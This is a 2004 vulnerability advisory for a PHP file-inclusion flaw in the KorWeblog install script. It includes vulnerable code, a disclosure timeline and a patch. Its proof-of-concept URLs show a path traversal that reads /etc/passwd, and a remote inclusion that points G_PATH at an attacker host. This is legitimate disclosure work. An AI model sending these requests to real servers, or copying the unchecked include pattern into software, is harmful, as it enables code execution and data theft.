KorWeblog.txt

`  
  
KorWeblog php injection Vulnerability  
  
Release Date : 2004/12/31 (KST)  
Author : Mins (mins at fsu.or.kr)  
Product : KorWeblog http://weblog.kldp.org  
Vendor-Status: Vendor was contacted but I could not receive reply message.  
Vendor-Patches: None  
Impact: Attacker can execute arbitrary php code.  
  
  
Summary  
=======  
KorWeblog is one of popular blog system in Korea.  
The "lng" parameter in "/install/index.php" isn't properly verified, before it is used to include files.  
And Attacker does not need "register_globals=On".  
So this vulnerability would allow remote user to inject php codes.  
  
  
Affected Products  
=================  
korweblog 1.6.2-cvs and prior  
  
- 1st case  
php.ini : magic_quotes_gpc = Off  
  
- 2nd case  
php.ini : magic_quotes_gpc = On  
  
- 3rd case  
php.ini : allow_url_fopen : On  
  
  
Vendor Status : NOT FIXED  
=============  
2004-12-23 Vulnerability found  
2004-12-26 Notified vendor.  
2004-12-27 Could not receive reply message.  
2004-12-27 Mins made temporary patch.  
2004-12-29 2nd vendor Contact.  
2004-12-30 Release of unoffical patch.  
2004-12-31 Offical advisory release.  
  
  
Details  
=======  
If "/install/index.php" exists, attacker can execute arbitrary php code.  
  
Part of weak source (/install/index.php)  
----  
ini_set('magic_quotes_gpc',1);  
ini_set('magic_quotes_sybase',0);  
  
include("../include/misc.inc.php");  
include("../include/sql.inc.php");  
include("include/check.inc.php");  
  
if(!ini_get("register_globals")) {  
include("include/grab_globals.inc.php");  
}  
  
$url = eregi_replace("(/install/|/install)$","",F_GetBaseURL());  
$path = eregi_replace("(/install/|/install)$","",dirname($_SERVER['SCRIPT_FILENAME']));  
  
$G_VER = "1.6.2";  
  
if (!empty($lng)) include("lang/$lng" . ".php");  
  
Keep in mind that the setting magic_quotes_gpc will not work at runtime.  
When the "magic_quotes_gpc" is 'Off', attacker can add '%00' to '$lng'.  
  
However if "magic_quotes_gpc" is 'On', attacker can open only '.php' file.  
That's right. But attacker is able to use another file.  
  
Part of another same package source (/include/main.inc.php)  
----  
if (eregi("main.inc.php", $_SERVER['PHP_SELF']))  
die ("You can not access this file directly...");  
  
set_magic_quotes_runtime(0);  
ini_set('magic_quotes_gpc',1);  
ini_set('magic_quotes_sybase',0);  
  
include("$G_PATH/include/sql.inc.php");  
include("$G_PATH/include/layout.inc.php");  
include("$G_PATH/include/parser.inc.php");  
  
  
Proof of Concepts  
=================  
  
- 1st case  
php.ini : register_globals = On, magic_quotes_gpc = Off  
http://[victim]/weblog/install/index.php?lng=../../../../../../etc/passwd%00  
  
- 2nd case  
php.ini : register_globals = On  
http://[victim]/weblog/install/index.php?lng=../../phpinfo  
  
- 3rd case  
php.ini : register_globals = On, allow_url_fopen : On  
http://[victim]/weblog/install/index.php?lng=../../include/main.inc&G_PATH=http://[hacker]  
  
Solution  
========  
- remove the install file  
  
- Set "allow_url_fopen" to "Off".  
  
- unoffical patch  
mins@hackme:~/public_html/korweblog-1.6.1/install$ cat index.diff  
--- index_1_6_1.php Mon Dec 27 17:31:50 2004  
+++ index.php Mon Dec 27 17:40:51 2004  
@@ -18,7 +18,10 @@  
  
$G_VER = "1.6.1";  
  
-if (!empty($lng)) include("lang/$lng" . ".php");  
+if (!empty($lng)) {  
+ if (eregi("\.\.",$lng) || eregi("/",$lng)) $lng="korean";  
+ include("lang/$lng" . ".php");  
+}  
  
$sql_form ="<P>  
<TABLE><TR><TD COLSPAN=2><B>". _SQL_INPUT ."</B></TD>  
  
Credits  
=======  
Mins at FSU (mins at fsu.or.kr)  
`